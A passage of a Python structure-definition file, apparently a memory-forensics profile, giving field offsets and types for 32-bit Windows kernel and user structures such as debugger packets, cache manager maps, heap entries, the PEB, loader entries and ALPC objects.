'SetSpecialCall' : [ 0x0, ['_DBGKD_SET_SPECIAL_CALL32']],
'SetInternalBreakpoint' : [ 0x0, ['_DBGKD_SET_INTERNAL_BREAKPOINT32']],
'GetInternalBreakpoint' : [ 0x0, ['_DBGKD_GET_INTERNAL_BREAKPOINT32']],
'GetVersion32' : [ 0x0, ['_DBGKD_GET_VERSION32']],
'BreakPointEx' : [ 0x0, ['_DBGKD_BREAKPOINTEX']],
'ReadWriteMsr' : [ 0x0, ['_DBGKD_READ_WRITE_MSR']],
'SearchMemory' : [ 0x0, ['_DBGKD_SEARCH_MEMORY']],
} ],
'_DBGKD_MANIPULATE_STATE32' : [ 0x34, {
'ApiNumber' : [ 0x0, ['unsigned long']],
'ProcessorLevel' : [ 0x4, ['unsigned short']],
'Processor' : [ 0x6, ['unsigned short']],
'ReturnStatus' : [ 0x8, ['long']],
'u' : [ 0xc, ['__unnamed_17f6']],
} ],
'_DBGKD_READ_WRITE_MSR' : [ 0xc, {
'Msr' : [ 0x0, ['unsigned long']],
'DataValueLow' : [ 0x4, ['unsigned long']],
'DataValueHigh' : [ 0x8, ['unsigned long']],
} ],
'_DBGKD_BREAKPOINTEX' : [ 0x8, {
'BreakPointCount' : [ 0x0, ['unsigned long']],
'ContinueStatus' : [ 0x4, ['long']],
} ],
'_DBGKD_SEARCH_MEMORY' : [ 0x18, {
'SearchAddress' : [ 0x0, ['unsigned long long']],
'FoundAddress' : [ 0x0, ['unsigned long long']],
'SearchLength' : [ 0x8, ['unsigned long long']],
'PatternLength' : [ 0x10, ['unsigned long']],
} ],
'_DBGKD_RESTORE_BREAKPOINT' : [ 0x4, {
'BreakPointHandle' : [ 0x0, ['unsigned long']],
} ],
'_DBGKD_CONTINUE' : [ 0x4, {
'ContinueStatus' : [ 0x0, ['long']],
} ],
'_DBGKD_CONTINUE2' : [ 0x20, {
'ContinueStatus' : [ 0x0, ['long']],
'ControlSet' : [ 0x4, ['_X86_DBGKD_CONTROL_SET']],
'AnyControlSet' : [ 0x4, ['_DBGKD_ANY_CONTROL_SET']],
} ],
'_POP_CPU_INFO' : [ 0x10, {
'Eax' : [ 0x0, ['unsigned long']],
'Ebx' : [ 0x4, ['unsigned long']],
'Ecx' : [ 0x8, ['unsigned long']],
'Edx' : [ 0xc, ['unsigned long']],
} ],
'_VOLUME_CACHE_MAP' : [ 0x20, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteCode' : [ 0x2, ['short']],
'UseCount' : [ 0x4, ['unsigned long']],
'DeviceObject' : [ 0x8, ['pointer', ['_DEVICE_OBJECT']]],
'VolumeCacheMapLinks' : [ 0xc, ['_LIST_ENTRY']],
'Flags' : [ 0x14, ['unsigned long']],
'DirtyPages' : [ 0x18, ['unsigned long']],
'PagesQueuedToDisk' : [ 0x1c, ['unsigned long']],
} ],
'_SHARED_CACHE_MAP' : [ 0x158, {
'NodeTypeCode' : [ 0x0, ['short']],
'NodeByteSize' : [ 0x2, ['short']],
'OpenCount' : [ 0x4, ['unsigned long']],
'FileSize' : [ 0x8, ['_LARGE_INTEGER']],
'BcbList' : [ 0x10, ['_LIST_ENTRY']],
'SectionSize' : [ 0x18, ['_LARGE_INTEGER']],
'ValidDataLength' : [ 0x20, ['_LARGE_INTEGER']],
'ValidDataGoal' : [ 0x28, ['_LARGE_INTEGER']],
'InitialVacbs' : [ 0x30, ['array', 4, ['pointer', ['_VACB']]]],
'Vacbs' : [ 0x40, ['pointer', ['pointer', ['_VACB']]]],
'FileObjectFastRef' : [ 0x44, ['_EX_FAST_REF']],
'VacbLock' : [ 0x48, ['_EX_PUSH_LOCK']],
'DirtyPages' : [ 0x4c, ['unsigned long']],
'LoggedStreamLinks' : [ 0x50, ['_LIST_ENTRY']],
'SharedCacheMapLinks' : [ 0x58, ['_LIST_ENTRY']],
'Flags' : [ 0x60, ['unsigned long']],
'Status' : [ 0x64, ['long']],
'Mbcb' : [ 0x68, ['pointer', ['_MBCB']]],
'Section' : [ 0x6c, ['pointer', ['void']]],
'CreateEvent' : [ 0x70, ['pointer', ['_KEVENT']]],
'WaitOnActiveCount' : [ 0x74, ['pointer', ['_KEVENT']]],
'PagesToWrite' : [ 0x78, ['unsigned long']],
'BeyondLastFlush' : [ 0x80, ['long long']],
'Callbacks' : [ 0x88, ['pointer', ['_CACHE_MANAGER_CALLBACKS']]],
'LazyWriteContext' : [ 0x8c, ['pointer', ['void']]],
'PrivateList' : [ 0x90, ['_LIST_ENTRY']],
'LogHandle' : [ 0x98, ['pointer', ['void']]],
'FlushToLsnRoutine' : [ 0x9c, ['pointer', ['void']]],
'DirtyPageThreshold' : [ 0xa0, ['unsigned long']],
'LazyWritePassCount' : [ 0xa4, ['unsigned long']],
'UninitializeEvent' : [ 0xa8, ['pointer', ['_CACHE_UNINITIALIZE_EVENT']]],
'BcbLock' : [ 0xac, ['_KGUARDED_MUTEX']],
'LastUnmapBehindOffset' : [ 0xd0, ['_LARGE_INTEGER']],
'Event' : [ 0xd8, ['_KEVENT']],
'HighWaterMappingOffset' : [ 0xe8, ['_LARGE_INTEGER']],
'PrivateCacheMap' : [ 0xf0, ['_PRIVATE_CACHE_MAP']],
'WriteBehindWorkQueueEntry' : [ 0x148, ['pointer', ['void']]],
'VolumeCacheMap' : [ 0x14c, ['pointer', ['_VOLUME_CACHE_MAP']]],
'ProcImagePathHash' : [ 0x150, ['unsigned long']],
'WritesInProgress' : [ 0x154, ['unsigned long']],
} ],
'__unnamed_1866' : [ 0x8, {
'FileOffset' : [ 0x0, ['_LARGE_INTEGER']],
'ActiveCount' : [ 0x0, ['unsigned short']],
} ],
'_VACB' : [ 0x20, {
'BaseAddress' : [ 0x0, ['pointer', ['void']]],
'SharedCacheMap' : [ 0x4, ['pointer', ['_SHARED_CACHE_MAP']]],
'Overlay' : [ 0x8, ['__unnamed_1866']],
'Links' : [ 0x10, ['_LIST_ENTRY']],
'ArrayHead' : [ 0x18, ['pointer', ['_VACB_ARRAY_HEADER']]],
} ],
'_KGUARDED_MUTEX' : [ 0x20, {
'Count' : [ 0x0, ['long']],
'Owner' : [ 0x4, ['pointer', ['_KTHREAD']]],
'Contention' : [ 0x8, ['unsigned long']],
'Gate' : [ 0xc, ['_KGATE']],
'KernelApcDisable' : [ 0x1c, ['short']],
'SpecialApcDisable' : [ 0x1e, ['short']],
'CombinedApcDisable' : [ 0x1c, ['unsigned long']],
} ],
'__unnamed_1884' : [ 0x4, {
'FileObject' : [ 0x0, ['pointer', ['_FILE_OBJECT']]],
} ],
'__unnamed_1886' : [ 0x4, {
'SharedCacheMap' : [ 0x0, ['pointer', ['_SHARED_CACHE_MAP']]],
} ],
'__unnamed_1888' : [ 0x4, {
'Event' : [ 0x0, ['pointer', ['_KEVENT']]],
} ],
'__unnamed_188a' : [ 0x4, {
'Reason' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_188c' : [ 0x4, {
'Read' : [ 0x0, ['__unnamed_1884']],
'Write' : [ 0x0, ['__unnamed_1886']],
'Event' : [ 0x0, ['__unnamed_1888']],
'Notification' : [ 0x0, ['__unnamed_188a']],
} ],
'_WORK_QUEUE_ENTRY' : [ 0x10, {
'WorkQueueLinks' : [ 0x0, ['_LIST_ENTRY']],
'Parameters' : [ 0x8, ['__unnamed_188c']],
'Function' : [ 0xc, ['unsigned char']],
} ],
'VACB_LEVEL_ALLOCATION_LIST' : [ 0x10, {
'VacbLevelList' : [ 0x0, ['_LIST_ENTRY']],
'VacbLevelWithBcbListHeads' : [ 0x8, ['pointer', ['void']]],
'VacbLevelsAllocated' : [ 0xc, ['unsigned long']],
} ],
'_VACB_LEVEL_REFERENCE' : [ 0x8, {
'Reference' : [ 0x0, ['long']],
'SpecialReference' : [ 0x4, ['long']],
} ],
'_CACHE_UNINITIALIZE_EVENT' : [ 0x14, {
'Next' : [ 0x0, ['pointer', ['_CACHE_UNINITIALIZE_EVENT']]],
'Event' : [ 0x4, ['_KEVENT']],
} ],
'_HEAP_LIST_LOOKUP' : [ 0x24, {
'ExtendedLookup' : [ 0x0, ['pointer', ['_HEAP_LIST_LOOKUP']]],
'ArraySize' : [ 0x4, ['unsigned long']],
'ExtraItem' : [ 0x8, ['unsigned long']],
'ItemCount' : [ 0xc, ['unsigned long']],
'OutOfRangeItems' : [ 0x10, ['unsigned long']],
'BaseIndex' : [ 0x14, ['unsigned long']],
'ListHead' : [ 0x18, ['pointer', ['_LIST_ENTRY']]],
'ListsInUseUlong' : [ 0x1c, ['pointer', ['unsigned long']]],
'ListHints' : [ 0x20, ['pointer', ['pointer', ['_LIST_ENTRY']]]],
} ],
'_HEAP' : [ 0x138, {
'Entry' : [ 0x0, ['_HEAP_ENTRY']],
'SegmentSignature' : [ 0x8, ['unsigned long']],
'SegmentFlags' : [ 0xc, ['unsigned long']],
'SegmentListEntry' : [ 0x10, ['_LIST_ENTRY']],
'Heap' : [ 0x18, ['pointer', ['_HEAP']]],
'BaseAddress' : [ 0x1c, ['pointer', ['void']]],
'NumberOfPages' : [ 0x20, ['unsigned long']],
'FirstEntry' : [ 0x24, ['pointer', ['_HEAP_ENTRY']]],
'LastValidEntry' : [ 0x28, ['pointer', ['_HEAP_ENTRY']]],
'NumberOfUnCommittedPages' : [ 0x2c, ['unsigned long']],
'NumberOfUnCommittedRanges' : [ 0x30, ['unsigned long']],
'SegmentAllocatorBackTraceIndex' : [ 0x34, ['unsigned short']],
'Reserved' : [ 0x36, ['unsigned short']],
'UCRSegmentList' : [ 0x38, ['_LIST_ENTRY']],
'Flags' : [ 0x40, ['unsigned long']],
'ForceFlags' : [ 0x44, ['unsigned long']],
'CompatibilityFlags' : [ 0x48, ['unsigned long']],
'EncodeFlagMask' : [ 0x4c, ['unsigned long']],
'Encoding' : [ 0x50, ['_HEAP_ENTRY']],
'PointerKey' : [ 0x58, ['unsigned long']],
'Interceptor' : [ 0x5c, ['unsigned long']],
'VirtualMemoryThreshold' : [ 0x60, ['unsigned long']],
'Signature' : [ 0x64, ['unsigned long']],
'SegmentReserve' : [ 0x68, ['unsigned long']],
'SegmentCommit' : [ 0x6c, ['unsigned long']],
'DeCommitFreeBlockThreshold' : [ 0x70, ['unsigned long']],
'DeCommitTotalFreeThreshold' : [ 0x74, ['unsigned long']],
'TotalFreeSize' : [ 0x78, ['unsigned long']],
'MaximumAllocationSize' : [ 0x7c, ['unsigned long']],
'ProcessHeapsListIndex' : [ 0x80, ['unsigned short']],
'HeaderValidateLength' : [ 0x82, ['unsigned short']],
'HeaderValidateCopy' : [ 0x84, ['pointer', ['void']]],
'NextAvailableTagIndex' : [ 0x88, ['unsigned short']],
'MaximumTagIndex' : [ 0x8a, ['unsigned short']],
'TagEntries' : [ 0x8c, ['pointer', ['_HEAP_TAG_ENTRY']]],
'UCRList' : [ 0x90, ['_LIST_ENTRY']],
'AlignRound' : [ 0x98, ['unsigned long']],
'AlignMask' : [ 0x9c, ['unsigned long']],
'VirtualAllocdBlocks' : [ 0xa0, ['_LIST_ENTRY']],
'SegmentList' : [ 0xa8, ['_LIST_ENTRY']],
'AllocatorBackTraceIndex' : [ 0xb0, ['unsigned short']],
'NonDedicatedListLength' : [ 0xb4, ['unsigned long']],
'BlocksIndex' : [ 0xb8, ['pointer', ['void']]],
'UCRIndex' : [ 0xbc, ['pointer', ['void']]],
'PseudoTagEntries' : [ 0xc0, ['pointer', ['_HEAP_PSEUDO_TAG_ENTRY']]],
'FreeLists' : [ 0xc4, ['_LIST_ENTRY']],
'LockVariable' : [ 0xcc, ['pointer', ['_HEAP_LOCK']]],
'CommitRoutine' : [ 0xd0, ['pointer', ['void']]],
'FrontEndHeap' : [ 0xd4, ['pointer', ['void']]],
'FrontHeapLockCount' : [ 0xd8, ['unsigned short']],
'FrontEndHeapType' : [ 0xda, ['unsigned char']],
'Counters' : [ 0xdc, ['_HEAP_COUNTERS']],
'TuningParameters' : [ 0x130, ['_HEAP_TUNING_PARAMETERS']],
} ],
'__unnamed_18dd' : [ 0x18, {
'CriticalSection' : [ 0x0, ['_RTL_CRITICAL_SECTION']],
} ],
'_HEAP_LOCK' : [ 0x18, {
'Lock' : [ 0x0, ['__unnamed_18dd']],
} ],
'_RTL_CRITICAL_SECTION' : [ 0x18, {
'DebugInfo' : [ 0x0, ['pointer', ['_RTL_CRITICAL_SECTION_DEBUG']]],
'LockCount' : [ 0x4, ['long']],
'RecursionCount' : [ 0x8, ['long']],
'OwningThread' : [ 0xc, ['pointer', ['void']]],
'LockSemaphore' : [ 0x10, ['pointer', ['void']]],
'SpinCount' : [ 0x14, ['unsigned long']],
} ],
'_HEAP_ENTRY' : [ 0x8, {
'Size' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned char']],
'SmallTagIndex' : [ 0x3, ['unsigned char']],
'SubSegmentCode' : [ 0x0, ['pointer', ['void']]],
'PreviousSize' : [ 0x4, ['unsigned short']],
'SegmentOffset' : [ 0x6, ['unsigned char']],
'LFHFlags' : [ 0x6, ['unsigned char']],
'UnusedBytes' : [ 0x7, ['unsigned char']],
'FunctionIndex' : [ 0x0, ['unsigned short']],
'ContextValue' : [ 0x2, ['unsigned short']],
'InterceptorValue' : [ 0x0, ['unsigned long']],
'UnusedBytesLength' : [ 0x4, ['unsigned short']],
'EntryOffset' : [ 0x6, ['unsigned char']],
'ExtendedBlockSignature' : [ 0x7, ['unsigned char']],
'Code1' : [ 0x0, ['unsigned long']],
'Code2' : [ 0x4, ['unsigned short']],
'Code3' : [ 0x6, ['unsigned char']],
'Code4' : [ 0x7, ['unsigned char']],
'AgregateCode' : [ 0x0, ['unsigned long long']],
} ],
'_HEAP_SEGMENT' : [ 0x40, {
'Entry' : [ 0x0, ['_HEAP_ENTRY']],
'SegmentSignature' : [ 0x8, ['unsigned long']],
'SegmentFlags' : [ 0xc, ['unsigned long']],
'SegmentListEntry' : [ 0x10, ['_LIST_ENTRY']],
'Heap' : [ 0x18, ['pointer', ['_HEAP']]],
'BaseAddress' : [ 0x1c, ['pointer', ['void']]],
'NumberOfPages' : [ 0x20, ['unsigned long']],
'FirstEntry' : [ 0x24, ['pointer', ['_HEAP_ENTRY']]],
'LastValidEntry' : [ 0x28, ['pointer', ['_HEAP_ENTRY']]],
'NumberOfUnCommittedPages' : [ 0x2c, ['unsigned long']],
'NumberOfUnCommittedRanges' : [ 0x30, ['unsigned long']],
'SegmentAllocatorBackTraceIndex' : [ 0x34, ['unsigned short']],
'Reserved' : [ 0x36, ['unsigned short']],
'UCRSegmentList' : [ 0x38, ['_LIST_ENTRY']],
} ],
'_HEAP_FREE_ENTRY' : [ 0x10, {
'Size' : [ 0x0, ['unsigned short']],
'Flags' : [ 0x2, ['unsigned char']],
'SmallTagIndex' : [ 0x3, ['unsigned char']],
'SubSegmentCode' : [ 0x0, ['pointer', ['void']]],
'PreviousSize' : [ 0x4, ['unsigned short']],
'SegmentOffset' : [ 0x6, ['unsigned char']],
'LFHFlags' : [ 0x6, ['unsigned char']],
'UnusedBytes' : [ 0x7, ['unsigned char']],
'FunctionIndex' : [ 0x0, ['unsigned short']],
'ContextValue' : [ 0x2, ['unsigned short']],
'InterceptorValue' : [ 0x0, ['unsigned long']],
'UnusedBytesLength' : [ 0x4, ['unsigned short']],
'EntryOffset' : [ 0x6, ['unsigned char']],
'ExtendedBlockSignature' : [ 0x7, ['unsigned char']],
'Code1' : [ 0x0, ['unsigned long']],
'Code2' : [ 0x4, ['unsigned short']],
'Code3' : [ 0x6, ['unsigned char']],
'Code4' : [ 0x7, ['unsigned char']],
'AgregateCode' : [ 0x0, ['unsigned long long']],
'FreeList' : [ 0x8, ['_LIST_ENTRY']],
} ],
'_PEB' : [ 0x248, {
'InheritedAddressSpace' : [ 0x0, ['unsigned char']],
'ReadImageFileExecOptions' : [ 0x1, ['unsigned char']],
'BeingDebugged' : [ 0x2, ['unsigned char']],
'BitField' : [ 0x3, ['unsigned char']],
'ImageUsesLargePages' : [ 0x3, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'IsProtectedProcess' : [ 0x3, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'IsLegacyProcess' : [ 0x3, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'IsImageDynamicallyRelocated' : [ 0x3, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
'SkipPatchingUser32Forwarders' : [ 0x3, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned char')]],
'SpareBits' : [ 0x3, ['BitField', dict(start_bit = 5, end_bit = 8, native_type='unsigned char')]],
'Mutant' : [ 0x4, ['pointer', ['void']]],
'ImageBaseAddress' : [ 0x8, ['pointer', ['void']]],
'Ldr' : [ 0xc, ['pointer', ['_PEB_LDR_DATA']]],
'ProcessParameters' : [ 0x10, ['pointer', ['_RTL_USER_PROCESS_PARAMETERS']]],
'SubSystemData' : [ 0x14, ['pointer', ['void']]],
'ProcessHeap' : [ 0x18, ['pointer', ['void']]],
'FastPebLock' : [ 0x1c, ['pointer', ['_RTL_CRITICAL_SECTION']]],
'AtlThunkSListPtr' : [ 0x20, ['pointer', ['void']]],
'IFEOKey' : [ 0x24, ['pointer', ['void']]],
'CrossProcessFlags' : [ 0x28, ['unsigned long']],
'ProcessInJob' : [ 0x28, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'ProcessInitializing' : [ 0x28, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'ProcessUsingVEH' : [ 0x28, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned long')]],
'ProcessUsingVCH' : [ 0x28, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned long')]],
'ProcessUsingFTH' : [ 0x28, ['BitField', dict(start_bit = 4, end_bit = 5, native_type='unsigned long')]],
'ReservedBits0' : [ 0x28, ['BitField', dict(start_bit = 5, end_bit = 32, native_type='unsigned long')]],
'KernelCallbackTable' : [ 0x2c, ['pointer', ['void']]],
'UserSharedInfoPtr' : [ 0x2c, ['pointer', ['void']]],
'SystemReserved' : [ 0x30, ['array', 1, ['unsigned long']]],
'AtlThunkSListPtr32' : [ 0x34, ['unsigned long']],
'ApiSetMap' : [ 0x38, ['pointer', ['void']]],
'TlsExpansionCounter' : [ 0x3c, ['unsigned long']],
'TlsBitmap' : [ 0x40, ['pointer', ['void']]],
'TlsBitmapBits' : [ 0x44, ['array', 2, ['unsigned long']]],
'ReadOnlySharedMemoryBase' : [ 0x4c, ['pointer', ['void']]],
'HotpatchInformation' : [ 0x50, ['pointer', ['void']]],
'ReadOnlyStaticServerData' : [ 0x54, ['pointer', ['pointer', ['void']]]],
'AnsiCodePageData' : [ 0x58, ['pointer', ['void']]],
'OemCodePageData' : [ 0x5c, ['pointer', ['void']]],
'UnicodeCaseTableData' : [ 0x60, ['pointer', ['void']]],
'NumberOfProcessors' : [ 0x64, ['unsigned long']],
'NtGlobalFlag' : [ 0x68, ['unsigned long']],
'CriticalSectionTimeout' : [ 0x70, ['_LARGE_INTEGER']],
'HeapSegmentReserve' : [ 0x78, ['unsigned long']],
'HeapSegmentCommit' : [ 0x7c, ['unsigned long']],
'HeapDeCommitTotalFreeThreshold' : [ 0x80, ['unsigned long']],
'HeapDeCommitFreeBlockThreshold' : [ 0x84, ['unsigned long']],
'NumberOfHeaps' : [ 0x88, ['unsigned long']],
'MaximumNumberOfHeaps' : [ 0x8c, ['unsigned long']],
'ProcessHeaps' : [ 0x90, ['pointer', ['pointer', ['void']]]],
'GdiSharedHandleTable' : [ 0x94, ['pointer', ['void']]],
'ProcessStarterHelper' : [ 0x98, ['pointer', ['void']]],
'GdiDCAttributeList' : [ 0x9c, ['unsigned long']],
'LoaderLock' : [ 0xa0, ['pointer', ['_RTL_CRITICAL_SECTION']]],
'OSMajorVersion' : [ 0xa4, ['unsigned long']],
'OSMinorVersion' : [ 0xa8, ['unsigned long']],
'OSBuildNumber' : [ 0xac, ['unsigned short']],
'OSCSDVersion' : [ 0xae, ['unsigned short']],
'OSPlatformId' : [ 0xb0, ['unsigned long']],
'ImageSubsystem' : [ 0xb4, ['unsigned long']],
'ImageSubsystemMajorVersion' : [ 0xb8, ['unsigned long']],
'ImageSubsystemMinorVersion' : [ 0xbc, ['unsigned long']],
'ActiveProcessAffinityMask' : [ 0xc0, ['unsigned long']],
'GdiHandleBuffer' : [ 0xc4, ['array', 34, ['unsigned long']]],
'PostProcessInitRoutine' : [ 0x14c, ['pointer', ['void']]],
'TlsExpansionBitmap' : [ 0x150, ['pointer', ['void']]],
'TlsExpansionBitmapBits' : [ 0x154, ['array', 32, ['unsigned long']]],
'SessionId' : [ 0x1d4, ['unsigned long']],
'AppCompatFlags' : [ 0x1d8, ['_ULARGE_INTEGER']],
'AppCompatFlagsUser' : [ 0x1e0, ['_ULARGE_INTEGER']],
'pShimData' : [ 0x1e8, ['pointer', ['void']]],
'AppCompatInfo' : [ 0x1ec, ['pointer', ['void']]],
'CSDVersion' : [ 0x1f0, ['_UNICODE_STRING']],
'ActivationContextData' : [ 0x1f8, ['pointer', ['_ACTIVATION_CONTEXT_DATA']]],
'ProcessAssemblyStorageMap' : [ 0x1fc, ['pointer', ['_ASSEMBLY_STORAGE_MAP']]],
'SystemDefaultActivationContextData' : [ 0x200, ['pointer', ['_ACTIVATION_CONTEXT_DATA']]],
'SystemAssemblyStorageMap' : [ 0x204, ['pointer', ['_ASSEMBLY_STORAGE_MAP']]],
'MinimumStackCommit' : [ 0x208, ['unsigned long']],
'FlsCallback' : [ 0x20c, ['pointer', ['_FLS_CALLBACK_INFO']]],
'FlsListHead' : [ 0x210, ['_LIST_ENTRY']],
'FlsBitmap' : [ 0x218, ['pointer', ['void']]],
'FlsBitmapBits' : [ 0x21c, ['array', 4, ['unsigned long']]],
'FlsHighIndex' : [ 0x22c, ['unsigned long']],
'WerRegistrationData' : [ 0x230, ['pointer', ['void']]],
'WerShipAssertPtr' : [ 0x234, ['pointer', ['void']]],
'pContextData' : [ 0x238, ['pointer', ['void']]],
'pImageHeaderHash' : [ 0x23c, ['pointer', ['void']]],
'TracingFlags' : [ 0x240, ['unsigned long']],
'HeapTracingEnabled' : [ 0x240, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'CritSecTracingEnabled' : [ 0x240, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
'SpareTracingBits' : [ 0x240, ['BitField', dict(start_bit = 2, end_bit = 32, native_type='unsigned long')]],
} ],
'_PEB_LDR_DATA' : [ 0x30, {
'Length' : [ 0x0, ['unsigned long']],
'Initialized' : [ 0x4, ['unsigned char']],
'SsHandle' : [ 0x8, ['pointer', ['void']]],
'InLoadOrderModuleList' : [ 0xc, ['_LIST_ENTRY']],
'InMemoryOrderModuleList' : [ 0x14, ['_LIST_ENTRY']],
'InInitializationOrderModuleList' : [ 0x1c, ['_LIST_ENTRY']],
'EntryInProgress' : [ 0x24, ['pointer', ['void']]],
'ShutdownInProgress' : [ 0x28, ['unsigned char']],
'ShutdownThreadId' : [ 0x2c, ['pointer', ['void']]],
} ],
'_LDR_DATA_TABLE_ENTRY' : [ 0x78, {
'InLoadOrderLinks' : [ 0x0, ['_LIST_ENTRY']],
'InMemoryOrderLinks' : [ 0x8, ['_LIST_ENTRY']],
'InInitializationOrderLinks' : [ 0x10, ['_LIST_ENTRY']],
'DllBase' : [ 0x18, ['pointer', ['void']]],
'EntryPoint' : [ 0x1c, ['pointer', ['void']]],
'SizeOfImage' : [ 0x20, ['unsigned long']],
'FullDllName' : [ 0x24, ['_UNICODE_STRING']],
'BaseDllName' : [ 0x2c, ['_UNICODE_STRING']],
'Flags' : [ 0x34, ['unsigned long']],
'LoadCount' : [ 0x38, ['unsigned short']],
'TlsIndex' : [ 0x3a, ['unsigned short']],
'HashLinks' : [ 0x3c, ['_LIST_ENTRY']],
'SectionPointer' : [ 0x3c, ['pointer', ['void']]],
'CheckSum' : [ 0x40, ['unsigned long']],
'TimeDateStamp' : [ 0x44, ['unsigned long']],
'LoadedImports' : [ 0x44, ['pointer', ['void']]],
'EntryPointActivationContext' : [ 0x48, ['pointer', ['_ACTIVATION_CONTEXT']]],
'PatchInformation' : [ 0x4c, ['pointer', ['void']]],
'ForwarderLinks' : [ 0x50, ['_LIST_ENTRY']],
'ServiceTagLinks' : [ 0x58, ['_LIST_ENTRY']],
'StaticLinks' : [ 0x60, ['_LIST_ENTRY']],
'ContextInformation' : [ 0x68, ['pointer', ['void']]],
'OriginalBase' : [ 0x6c, ['unsigned long']],
'LoadTime' : [ 0x70, ['_LARGE_INTEGER']],
} ],
'_HEAP_SUBSEGMENT' : [ 0x20, {
'LocalInfo' : [ 0x0, ['pointer', ['_HEAP_LOCAL_SEGMENT_INFO']]],
'UserBlocks' : [ 0x4, ['pointer', ['_HEAP_USERDATA_HEADER']]],
'AggregateExchg' : [ 0x8, ['_INTERLOCK_SEQ']],
'BlockSize' : [ 0x10, ['unsigned short']],
'Flags' : [ 0x12, ['unsigned short']],
'BlockCount' : [ 0x14, ['unsigned short']],
'SizeIndex' : [ 0x16, ['unsigned char']],
'AffinityIndex' : [ 0x17, ['unsigned char']],
'Alignment' : [ 0x10, ['array', 2, ['unsigned long']]],
'SFreeListEntry' : [ 0x18, ['_SINGLE_LIST_ENTRY']],
'Lock' : [ 0x1c, ['unsigned long']],
} ],
'__unnamed_195c' : [ 0x4, {
'DataLength' : [ 0x0, ['short']],
'TotalLength' : [ 0x2, ['short']],
} ],
'__unnamed_195e' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_195c']],
'Length' : [ 0x0, ['unsigned long']],
} ],
'__unnamed_1960' : [ 0x4, {
'Type' : [ 0x0, ['short']],
'DataInfoOffset' : [ 0x2, ['short']],
} ],
'__unnamed_1962' : [ 0x4, {
's2' : [ 0x0, ['__unnamed_1960']],
'ZeroInit' : [ 0x0, ['unsigned long']],
} ],
'_PORT_MESSAGE' : [ 0x18, {
'u1' : [ 0x0, ['__unnamed_195e']],
'u2' : [ 0x4, ['__unnamed_1962']],
'ClientId' : [ 0x8, ['_CLIENT_ID']],
'DoNotUseThisField' : [ 0x8, ['double']],
'MessageId' : [ 0x10, ['unsigned long']],
'ClientViewSize' : [ 0x14, ['unsigned long']],
'CallbackId' : [ 0x14, ['unsigned long']],
} ],
'_ALPC_MESSAGE_ATTRIBUTES' : [ 0x8, {
'AllocatedAttributes' : [ 0x0, ['unsigned long']],
'ValidAttributes' : [ 0x4, ['unsigned long']],
} ],
'_ALPC_HANDLE_ENTRY' : [ 0x4, {
'Object' : [ 0x0, ['pointer', ['void']]],
} ],
'_BLOB_TYPE' : [ 0x24, {
'ResourceId' : [ 0x0, ['Enumeration', dict(target = 'long', choices = {0: 'BLOB_TYPE_UNKNOWN', 1: 'BLOB_TYPE_CONNECTION_INFO', 2: 'BLOB_TYPE_MESSAGE', 3: 'BLOB_TYPE_SECURITY_CONTEXT', 4: 'BLOB_TYPE_SECTION', 5: 'BLOB_TYPE_REGION', 6: 'BLOB_TYPE_VIEW', 7: 'BLOB_TYPE_RESERVE', 8: 'BLOB_TYPE_DIRECT_TRANSFER', 9: 'BLOB_TYPE_HANDLE_DATA', 10: 'BLOB_TYPE_MAX_ID'})]],
'PoolTag' : [ 0x4, ['unsigned long']],
'Flags' : [ 0x8, ['unsigned long']],
'CreatedObjects' : [ 0xc, ['unsigned long']],
'DeletedObjects' : [ 0x10, ['unsigned long']],
'DeleteProcedure' : [ 0x14, ['pointer', ['void']]],
'DestroyProcedure' : [ 0x18, ['pointer', ['void']]],
'UsualSize' : [ 0x1c, ['unsigned long']],
'LookasideIndex' : [ 0x20, ['unsigned long']],
} ],
'__unnamed_197e' : [ 0x1, {
'ReferenceCache' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned char')]],
'Lookaside' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned char')]],
'Initializing' : [ 0x0, ['BitField', dict(start_bit = 2, end_bit = 3, native_type='unsigned char')]],
'Deleted' : [ 0x0, ['BitField', dict(start_bit = 3, end_bit = 4, native_type='unsigned char')]],
} ],
'__unnamed_1980' : [ 0x1, {
's1' : [ 0x0, ['__unnamed_197e']],
'Flags' : [ 0x0, ['unsigned char']],
} ],
'_BLOB' : [ 0x18, {
'ResourceList' : [ 0x0, ['_LIST_ENTRY']],
'FreeListEntry' : [ 0x0, ['_SINGLE_LIST_ENTRY']],
'u1' : [ 0x8, ['__unnamed_1980']],
'ResourceId' : [ 0x9, ['unsigned char']],
'CachedReferences' : [ 0xa, ['short']],
'ReferenceCount' : [ 0xc, ['long']],
'Lock' : [ 0x10, ['_EX_PUSH_LOCK']],
'Pad' : [ 0x14, ['unsigned long']],
} ],
'__unnamed_1992' : [ 0x4, {
'Internal' : [ 0x0, ['BitField', dict(start_bit = 0, end_bit = 1, native_type='unsigned long')]],
'Secure' : [ 0x0, ['BitField', dict(start_bit = 1, end_bit = 2, native_type='unsigned long')]],
} ],
'__unnamed_1994' : [ 0x4, {
's1' : [ 0x0, ['__unnamed_1992']],
} ],
'_KALPC_SECTION' : [ 0x28, {
'SectionObject' : [ 0x0, ['pointer', ['void']]],
'Size' : [ 0x4, ['unsigned long']],
'HandleTable' : [ 0x8, ['pointer', ['_ALPC_HANDLE_TABLE']]],
'SectionHandle' : [ 0xc, ['pointer', ['void']]],
'OwnerProcess' : [ 0x10, ['pointer', ['_EPROCESS']]],
'OwnerPort' : [ 0x14, ['pointer', ['_ALPC_PORT']]],
'u1' : [ 0x18, ['__unnamed_1994']],
'NumberOfRegions' : [ 0x1c, ['unsigned long']],
